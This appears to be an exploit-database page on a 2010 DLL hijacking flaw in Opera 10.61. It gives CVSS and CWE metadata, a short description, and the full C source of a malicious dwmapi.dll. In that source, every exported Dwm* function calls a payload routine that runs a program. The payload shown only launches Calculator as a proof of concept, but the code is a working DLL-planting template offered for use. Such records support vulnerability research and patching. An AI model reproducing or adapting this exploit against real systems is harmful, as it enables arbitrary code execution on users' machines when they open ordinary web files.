header-logo
Suggest Exploit
vendor:
Opera
by:
Nicolas Krassas
7,5
CVSS
HIGH
DLL Hijacking
427
CWE
Product Name: Opera
Affected Version From: 10.61
Affected Version To: 10.61
Patch Exists: YES
Related CWE: N/A
CPE: o:opera_software:opera
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows XP SP3
2010

Opera DLL Hijacking Exploit ( dwmapi.dll )

This exploit is based on the exploit from 'TheLeader' and affects Opera 10.61 on Windows XP SP3. It hijacks the dwmapi.dll library and executes a malicious payload when vulnerable extensions such as .htm, .mht, .mhtml, .xht, .xhtm, and .xhtl are opened.

Mitigation:

Ensure that all applications are up to date and patched with the latest security updates.
Source

Exploit-DB raw data:

/* 
Exploit Title: Opera DLL Hijacking Exploit ( dwmapi.dll )
Date: 24/08/2010
Author: Nicolas Krassas 
http://twitter.com/Dinosn
Version: Opera 10.61
Tested on: Windows XP SP3
The code is based on the exploit from "TheLeader"
Vulnerable extensions: .htm .mht .mhtml .xht .xhtm .xhtl
dwmapi.dll is used in other applications too
*/

#include <windows.h>
#define DLLIMPORT __declspec (dllexport)

DLLIMPORT void  DwmDefWindowProc() { evil(); }
DLLIMPORT void  DwmEnableBlurBehindWindow() { evil(); }
DLLIMPORT void  DwmEnableComposition() { evil(); }
DLLIMPORT void  DwmEnableMMCSS() { evil(); }
DLLIMPORT void  DwmExtendFrameIntoClientArea() { evil(); }
DLLIMPORT void  DwmGetColorizationColor() { evil(); }
DLLIMPORT void  DwmGetCompositionTimingInfo() { evil(); }
DLLIMPORT void  DwmGetWindowAttribute() { evil(); }
DLLIMPORT void  DwmIsCompositionEnabled() { evil(); }
DLLIMPORT void  DwmModifyPreviousDxFrameDuration() { evil(); }
DLLIMPORT void  DwmQueryThumbnailSourceSize() { evil(); }
DLLIMPORT void  DwmRegisterThumbnail() { evil(); }
DLLIMPORT void  DwmSetDxFrameDuration() { evil(); }
DLLIMPORT void  DwmSetPresentParameters() { evil(); }
DLLIMPORT void  DwmSetWindowAttribute() { evil(); }
DLLIMPORT void  DwmUnregisterThumbnail() { evil(); }
DLLIMPORT void  DwmUpdateThumbnailProperties() { evil(); }

int evil()
{
  WinExec("calc", 0);
  exit(0);
  return 0;
}

Navigation

Suggest Exploit

Services By CQR